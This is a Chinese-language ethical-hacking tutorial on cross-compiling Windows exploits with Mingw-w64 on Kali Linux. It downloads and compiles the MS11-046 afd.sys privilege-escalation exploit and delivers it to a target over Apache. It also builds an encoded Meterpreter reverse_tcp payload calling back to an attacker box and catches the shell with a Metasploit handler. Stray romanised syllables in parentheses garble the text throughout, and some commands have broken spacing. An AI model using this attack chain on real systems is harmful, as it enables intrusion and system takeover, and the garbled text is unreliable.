Mingw-w64是一個(gè)用于創(chuàng)建Windows應(yīng)用程序的自由和開源軟件開發(fā)環(huán)境。 Mingw-w64最初叫Mingw32，它當(dāng)時(shí)不支持64位架構(gòu)。

在本教程中，我們將討論如何使用Mingw-64在 Kali Linux上編譯Windows漏洞。 讓我們開始在Kali Linux上安裝Mingw-w64。

1、在Kali Linux上安裝Mingw-w64

默認(rèn)情況下，Kali Linux 2016.2和更低版本上未安裝Mingw-w64。 因此，我們需要先安裝它，然后才能在Linux上編譯Windows漏洞。 執(zhí)行以下命令，安裝Mingw-w64：

apt-get update 
 
apt-get install mingw-w64    

使用apt-get install mingw-w64在您的Kali主機(jī)上安裝mingw-w64。

鍵入y為yes，以確認(rèn)并繼續(xù)Mingw-w64安裝過程。 下載和安裝Mingw-w64可能需要一段時(shí)間才能完成。

2、無法找到程序包mingw-w64的解決方法

有時(shí)，你嘗試安裝mingw-w64包時(shí)得到一個(gè)無法找到包mingw-w64的錯(cuò)誤，并得到類似如下提示：

root@kali:~# apt-getinstall mingw-w64 
 
Reading package lists…Done 
 
Building dependency tree 
 
Reading stateinformation… Done 
 
E: Unable to locatepackage mingw-w64  

要解決這個(gè)問題，請(qǐng)確保在sources.list文件中具有正確的存儲(chǔ)庫。您可以使用nano編輯文件：

/etc/apt/sources.list

確保您在此文件中具有正確的存儲(chǔ)庫。 您可以在以下頁面上找到不同版本的Kali Linux的存儲(chǔ)庫：

http://docs.kali.org/general-use/kali-linux-sources-list-repositories

使用sources.list文件中的正確的存儲(chǔ)庫，您需要運(yùn)行apt-get update，然后再次運(yùn)行Mingw-w64軟件包的安裝命令。

3、用Mingw-w64交叉編譯Windows漏洞利用

現(xiàn)在我們已經(jīng)安裝了Mingw-w64，可以開始編譯Windows漏洞利用程序了。 對(duì)于本教程，我們將編譯一個(gè)用C編寫的Windows漏洞利用程序，以利用Windows 7 SP0 x86中的CVE-2011-1249(MS11-046)漏洞。 此版本的Windows操作系統(tǒng)在輔助功能驅(qū)動(dòng)程序(AFD)中包含一個(gè)漏洞，允許已認(rèn)證的非管理用戶提升權(quán)限。即使Mingw-w64是為非常需要的64位支持開發(fā)的，我們也可以編譯32位Windows漏洞。 讓我們來看看如何編譯32位Windows漏洞。

讓我們從Exploit-db下載漏洞：

wget --output-document= 40564.c https://www.exploit-db.com/download/40564

使用以下命令編譯Windows 32位的afd.sys exploit：

i686-w64-mingw32-gcc[input file: source]–o [output file: .exe]-lws2_32

以下命令將編譯Windows 7 afd.sys特權(quán)升級(jí)漏洞：

i686-w64-mingw32-gcc 40564.c –o exploit.exe –lws2_32   

編譯Windows漏洞。

要將漏洞利用程序轉(zhuǎn)移到目標(biāo)主機(jī)，我們將使用內(nèi)置的ApacheWeb服務(wù)器來提供它。 最后2個(gè)命令會(huì)將exploit復(fù)制到Apache主目錄并啟動(dòng)Apache Web服務(wù)器。

當(dāng)我們從cmd.exe下載并執(zhí)行該漏洞時(shí)，它將如下所示：  

漏洞利用成功執(zhí)行。

因?yàn)槲覀兛梢钥吹絯hoami命令在執(zhí)行exploit之前返回一個(gè)普通用戶權(quán)限，之后顯示是system用戶權(quán)限。這個(gè)exploit實(shí)際上在當(dāng)前shell中生成一個(gè)新的shell，而不是在新窗口中創(chuàng)建一個(gè)新的shell。這意味著我們也可以從命令行shell運(yùn)行此漏洞利用程序，例如Meterpreter。讓我們看看如何從Meterpreter會(huì)話運(yùn)行漏洞利用。

4、利用編譯錯(cuò)誤

當(dāng)編譯針對(duì)不同架構(gòu)和操作系統(tǒng)的漏洞時(shí)，可能會(huì)發(fā)生許多錯(cuò)誤。有很多因素可能導(dǎo)致編譯失敗，例如：語法，庫，主機(jī)和目標(biāo)體系結(jié)構(gòu)，用于編譯代碼的已安裝軟件等等。一些錯(cuò)誤可能很容易修復(fù)，有些錯(cuò)誤則不是。同樣重要的是不同的警告來自致命的錯(cuò)誤，因?yàn)榫婵赡苤皇侵甘疽恍╊愃频倪^時(shí)的功能，不能阻止漏洞的工作。致命錯(cuò)誤會(huì)阻止漏洞利用，因此需要修復(fù)。

處理編譯錯(cuò)誤的最佳方法是仔細(xì)閱讀，然后在Google上搜索解決方案。通常你不是第一個(gè)也不是唯一面對(duì)某個(gè)編譯錯(cuò)誤的人，因此沒有必要重新發(fā)明輪子。在線資源(如堆棧交換)通常為您提供最常見的編譯錯(cuò)誤的可能解決方案。

5、從Meterpreter shell中利用MS11-046

讓我們使用Msfvenom快速生成Windows 32位Meterpreter反向TCP有效負(fù)載，并在目標(biāo)主機(jī)上執(zhí)行它。 我們將在Metasploit中使用多處理程序來捕獲反向shell。

使用以下命令使用Msfvenom創(chuàng)建有效負(fù)載：

msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcpLHOST=[IP attackbox] LPORT=4444 -e x86/shikata_ga_nai –f exe –o exploit.exe

請(qǐng)務(wù)必更換偵聽主機(jī)IP，必要時(shí)更換偵聽端口?，F(xiàn)在啟動(dòng)msfconsole并運(yùn)行以下命令來設(shè)置多處理器漏洞：

use exploit/multi/handler 
 
set lhost [listening host IP] 
 
set lport 4444 
 
run   

在端口4444上啟動(dòng)反向TCP處理程序。

然后下載利用程序到目標(biāo)主機(jī)并執(zhí)行它。 如果一切設(shè)置正確，您應(yīng)該在msfconsole上收到一個(gè)反向Meterpreter shell：  

目標(biāo)主機(jī)連接回Kali。

在Meterpreter命令行上運(yùn)行下一“shell”命令并運(yùn)行特權(quán)升級(jí)漏洞利用程序?qū)hell升級(jí)到系統(tǒng)shell：  

特權(quán)升級(jí)攻擊通過我們的Meterpreter會(huì)話成功執(zhí)行。

正如你可以看到的，shell從特權(quán)測(cè)試用戶shell變化到系統(tǒng)shell。 請(qǐng)注意，在執(zhí)行它的shell中生成一個(gè)新的系統(tǒng)shell。 因此，我們不能看到利用輸出，因?yàn)樗窃谟邢薜奶貦?quán)的舊shell。

您可以通過鍵入Exit來驗(yàn)證這一點(diǎn)，將退出系統(tǒng)shell并返回到仍包含Windows 7權(quán)限升級(jí)exploit輸出的用戶shell：  

特權(quán)用戶shell上的exploit輸出。

學(xué)到的東西

在本教程中，我們已經(jīng)了解了在Linux上針對(duì)Windows的交叉編譯漏洞的基礎(chǔ)知識(shí)。 我們已經(jīng)學(xué)習(xí)了如何在Kali Linux上安裝Mingw-w64并解決最常見的安裝問題。 為了練習(xí)漏洞編譯過程，我們編譯了一個(gè)針對(duì)Windows7 x86的特權(quán)提升漏洞。 這也稱為交叉編譯。

我們已成功的在目標(biāo)主機(jī)上執(zhí)行已編譯的可執(zhí)行文件，并將shell從有限的用戶shell升級(jí)到系統(tǒng)shell。 我們已經(jīng)知道，這個(gè)特殊的exploit在shell中生成了一個(gè)shell，在這個(gè)shell中執(zhí)行了exploit。 這樣，我們還可以從命令行(例如Meterpreter shell)執(zhí)行特權(quán)提升漏洞利用。

最后但同樣重要的是，我們已經(jīng)了解了如何在編譯過程中修復(fù)錯(cuò)誤。

作為一個(gè)道德黑客和滲透測(cè)試者，建議咨詢資源，如堆棧交換，以搜索解決方案的編譯錯(cuò)誤。